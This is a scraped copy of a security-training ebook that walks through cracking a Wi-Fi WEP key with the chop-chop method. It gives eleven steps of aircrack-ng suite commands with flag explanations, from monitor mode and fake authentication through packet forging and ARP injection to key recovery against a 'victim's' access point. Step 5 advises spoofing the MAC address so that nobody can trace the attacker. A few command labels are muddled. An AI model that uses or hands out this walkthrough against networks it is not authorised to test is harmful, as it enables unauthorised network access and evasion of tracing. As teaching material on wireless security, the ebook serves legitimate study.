Date post: | 14-Apr-2018 |
Category: |
Documents |
Upload: | rifqi-multazam |
View: | 225 times |
Download: | 0 times |
7/29/2019 Seculabs eBook - Wi-Fi WEP Cracking Using Chopchop Attack
http://slidepdf.com/reader/full/seculabs-ebook-wi-fi-wep-cracking-using-chopchop-attack 1/15
7/29/2019 Seculabs eBook - Wi-Fi WEP Cracking Using Chopchop Attack
http://slidepdf.com/reader/full/seculabs-ebook-wi-fi-wep-cracking-using-chopchop-attack 2/15
SECUGENIUS SECURITY SOLUTIONS
--------------------------------------------------------------------------------------
(A UNIT OF HARKSH TECHNOLOGIES PVT. LTD)
Company Profile:
Secugenius Security Solutions is a Student Entrepreneurial Company started by 2 Social Student
Entrepreneurs in 2010 with an aim to make our country Cyber Crime Free. We at SECUGENIUS
are headquartered at Ludhiana, the Manchester of Punjab. The main activities of Secugenius
Security Solutions are providing training in Information Security and various professional courses.
Secugenius Security Solutions is an organization which believes in inventing and implementing newideas to influence the technological minds of the youngsters
Looking at the number of Cyber Crimes since last many years, We at Secugenius Security
Solutions provides training on Ethical hacking & Cyber Security to students, IT Professionals, Bank
Employees, Police officials.
Secugenius conducts workshops in all parts of the country in various Colleges/institutions for the
benefit of the students & making them aware of the latest trends in technological era of the
Computer age. We believe in spreading knowledge to all the youngsters & growing minds of the
nation so that they could serve the nation with perfect skill-sets in the field of Cyber Crime
Investigation & Forensic Sciences
Secugenius provides various security solutions to its clients by securing their websites from cyber
attacks. We provide training to college students, graduates and professionals in various fields.
Education is delivered to students through two modes i.e. Regular mode and Distance mode which
are available as short term and long term courses.
In the workshops conducted by Secugenius, participants can claim to be trained by the highly
experienced & skilled corporate trainers from different parts of the nation. We believe in making
the base of students to be as strong as possible. All the modules have been designed in order to
provide students with specialized knowledge by specialized trainers.
This library was furnished, managed and funded by the Founders and Directors of Secugenius
Er. Harpreet Khattar & Er. Kshitij Adhlakha. The overall resource person for the content of
the series of this Digital Library is Er. Chetan Soni - Sr. Security Specialist, Secugenius Security
Solutions.
This Online Digital Library has been initiated as a free resource & permanent
resource on specialization basis for every student of Team Secugenius.
7/29/2019 Seculabs eBook - Wi-Fi WEP Cracking Using Chopchop Attack
http://slidepdf.com/reader/full/seculabs-ebook-wi-fi-wep-cracking-using-chopchop-attack 3/15
Wi-Fi WEP Cracking using Chop-Chop Method
Product ID No: SG/ODL/13028
Founder & Director: Harpreet Khattar & Kshitij Adhlakha
Resource Person: Chetan Soni & Loveleen Arora
Secugenius Security Solutions
SCO-13A, Model Town Extn, Near Krishna Mandir,
Ludhiana-141002, Punjab – India
[email protected], [email protected]
www.secugenius.com , www.seculabs.in
7/29/2019 Seculabs eBook - Wi-Fi WEP Cracking Using Chopchop Attack
http://slidepdf.com/reader/full/seculabs-ebook-wi-fi-wep-cracking-using-chopchop-attack 4/15
In previous WEP cracking method, we use to send the Deauthenticationpackets to the client’s connected to the victim’s AP (Access Point), then wecapture the reply packets and crack WEP.
But what if clients are not there…??? No packets are being captured…??? So
in that case Deauth does not work.
Solution to this is “CHOP-CHOP METHOD”
Requirements for CHOP-CHOP Method:-
MAC address of Your System BSSID ESSID
Channel ID Wireless Interface Windows 2000/Xp/Seven/Vista/8/Linux Distro Backtrack Linux Operating System (Live or ISO) VMware Workstation (If you use an ISO File) Wireless USB Adaptor (If you use VMware Workstation)
Our System Configuration Details:-
MAC Address = 00:11:22:33:44:55 BSSID = 80:1F:02:02:6C:C4 ESSID = Chetansoni Channel ID = 11 Wireless Interface = wlan0 Security = WEP (64-Bit Encryption)
First Start Backtrack Linux Operating system inside VMware Workstationnamed as BT-5-R3 Version.
Some Basic Commands which is very helpful when you use Backtrack. iwconfig
ifconfig
pwd
ls startx
Username – root and Password – toor (By Default in BT5)
7/29/2019 Seculabs eBook - Wi-Fi WEP Cracking Using Chopchop Attack
http://slidepdf.com/reader/full/seculabs-ebook-wi-fi-wep-cracking-using-chopchop-attack 5/15
Step 1 —
Start Terminal and type this command for checking your wireless device.
root@bt:~# iwconfig
Wlan0IEEE 802.11bgn ESSID:off/anyMode:Managed Access Point: Not Associated Tx-power=20 DbmRetry long limit:7 RTS thr:off Fragment thr:off Encryption Key:off Power Management:off
7/29/2019 Seculabs eBook - Wi-Fi WEP Cracking Using Chopchop Attack
http://slidepdf.com/reader/full/seculabs-ebook-wi-fi-wep-cracking-using-chopchop-attack 6/15
Step 2 –
Start the wireless interface in monitor mode by using this command,
root@bt:~# airmon-ng start wlan0
7/29/2019 Seculabs eBook - Wi-Fi WEP Cracking Using Chopchop Attack
http://slidepdf.com/reader/full/seculabs-ebook-wi-fi-wep-cracking-using-chopchop-attack 7/15
Step 3 –
Observe the wireless connections within range and copy the BSSID andchannel number of your victim’s AP (Access Point)
root@bt:~# airodump-ng mon0
Here’s Our Target =Chetansoni (Bssid – 80:1F:02:02:6C:C4 with Channel – 11)
7/29/2019 Seculabs eBook - Wi-Fi WEP Cracking Using Chopchop Attack
http://slidepdf.com/reader/full/seculabs-ebook-wi-fi-wep-cracking-using-chopchop-attack 8/15
Step 4 –
Further, we use airodump-ng with some options to view the details of thevictim’s AP.
root@bt:~# airodump-ng –c 11 –w Chetansoni --bssid80:1F:02:02:6C:C4 mon0
Where,
-c = Channel ID -w = Writing captured data --bssid = MAC Address of AP (Your Target)
mon0 = Monitor Mode
7/29/2019 Seculabs eBook - Wi-Fi WEP Cracking Using Chopchop Attack
http://slidepdf.com/reader/full/seculabs-ebook-wi-fi-wep-cracking-using-chopchop-attack 9/15
Step 5 –
Now Change your MAC address so that nobody can trace you back.
For doing that, first make your wireless device down and after changing MAC,make it up.
root@bt:~# ifconfig wlan0 down
root@bt:~# macchanger --mac 00:11:22:33:44:55 wlan0
root@bt:~# ifconfig wlan0 up
7/29/2019 Seculabs eBook - Wi-Fi WEP Cracking Using Chopchop Attack
http://slidepdf.com/reader/full/seculabs-ebook-wi-fi-wep-cracking-using-chopchop-attack 10/15
Step 6 –
Use aireplay-ng to do a fake authentication with the access point.
In order for an access point to accept a packet, the source MAC
address must already be associated. If the source MAC address you
are injecting is not associated then the AP ignores the packet and
sends out a “ Deauthentication ” packet. In this state, no new IVs are
created because the AP is ignoring all the injected packets.
The lack of association with the access point is the single
biggest reason why injection fails.
To associate with an access point, use fake authentication:
root@bt:~# aireplay-ng -1 0 -e Chetansoni -a 80:1F:02:02:6C:C4 -h00:11:22:33:44:55 mon0
Where,
-1 = Fake Authentication0 = Reassociation (In seconds)-e Chetansoni = Wireless network name-a 80:1F:02:02:6C:C4 = Access point MAC address-h 00:11:22:33:44:55 = our card MAC addressmon0 = wireless interface name
7/29/2019 Seculabs eBook - Wi-Fi WEP Cracking Using Chopchop Attack
http://slidepdf.com/reader/full/seculabs-ebook-wi-fi-wep-cracking-using-chopchop-attack 11/15
Step 7 –
Use aireplay-ng chopchop or ARP replay attack
root@bt:~# aireplay-ng -4 -h 00:11:22:33:44:55 -b
80:1F:02:02:6C:C4 mon0
-4 = Arp Replay attack of Aireplay-ng-h = MAC Address of your wireless Device-b = Bssid or MAC of AP
7/29/2019 Seculabs eBook - Wi-Fi WEP Cracking Using Chopchop Attack
http://slidepdf.com/reader/full/seculabs-ebook-wi-fi-wep-cracking-using-chopchop-attack 12/15
Step 8 –
Whenever you type ―y‖ in the last step, I’ll capture ARP replay packets andafter its completion, it will create a XOR file named as “replay_dec-1215-
134729.xor”
7/29/2019 Seculabs eBook - Wi-Fi WEP Cracking Using Chopchop Attack
http://slidepdf.com/reader/full/seculabs-ebook-wi-fi-wep-cracking-using-chopchop-attack 13/15
Step 9 –
Use packetforge-ng to make the XOR file usable for cracking intoaircrack-ng
root@bt:~# packetforge-ng -0 –a 80:1F:02:02:6C:C4 –k 255.255.255.255 –l 255.255.255.255 – y replay_dec-1215-134729.xor –w arp-request
Where,
-0 = It generates ARP packet-a 80:1F:02:02:6C:C4 = Access point MAC address
-k 255.255.255.255 = Dest. IP (most APs respond to 255.255.255.255)-l 255.255.255.255 = Source IP (most APs respond to 255.255.255.255)-y replay_dec-1215-134729.xor = to read the PRGA -w arp-request = Name of file to write the ARP packet
7/29/2019 Seculabs eBook - Wi-Fi WEP Cracking Using Chopchop Attack
http://slidepdf.com/reader/full/seculabs-ebook-wi-fi-wep-cracking-using-chopchop-attack 14/15
Step 10 –
Inject the ARP packet by using this following command:
root@bt:~# aireplay-ng -2 –h 80:1F:02:02:6C:C4 –r arp-request
mon0
Where,
-2 =Use interactive frame selection-h = Fake MAC-r arp-request = Defines the file name from which to read the Arp packetmon0 = Defines the monitor mode
Use this Packet – ― Y ‖
7/29/2019 Seculabs eBook - Wi-Fi WEP Cracking Using Chopchop Attack
http://slidepdf.com/reader/full/seculabs-ebook-wi-fi-wep-cracking-using-chopchop-attack 15/15
Step 11 –
Run aircrack-ng to obtain the WEP key
root@bt:~# aircrack-ng –n 64 –z –f 1 –e Chetansoni –b
80:1F:02:02:6C:C4 Chetansoni-01.cap
-n = Number of WEP bits key Applied e.g. 64,128,256 bit-e = Victim’s ESSID -b = Victim’s BSSID Cap = capture file which we mentioned in airodump command.